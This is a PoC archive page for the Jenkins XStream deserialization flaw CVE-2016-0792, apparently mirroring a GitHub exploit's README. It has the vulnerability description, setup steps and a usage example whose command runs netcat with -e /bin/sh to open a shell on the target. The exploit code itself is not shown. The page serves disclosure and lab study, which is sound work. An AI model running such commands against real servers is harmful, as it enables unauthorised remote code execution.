Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2016-0792 PoC — CloudBees Jenkins CI和LTS 任意代码执行漏洞

Source
https://github.com/jpiechowka/jenkins-cve-2016-0792
Associated Vulnerability
Title:CloudBees Jenkins CI和LTS 任意代码执行漏洞 (CVE-2016-0792)
Description:Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Description
Exploit for Jenkins serialization vulnerability - CVE-2016-0792
Readme
# Jenkins CVE-2016-0792
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792

#### Exploit database

[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)

#### More information can be found here

1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)

2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

#### Requirements

1. Python 3.6.x

2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work

      `sudo pip install requests`

#### Usage

`python3`

`from exploit import exploit`

`exploit(url, command)`

Where url is url to jenkins server and command is command to execute

##### Example

`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

[![asciicast](https://asciinema.org/a/131436.png)](https://asciinema.org/a/131436)

#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using
 this software against the law.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →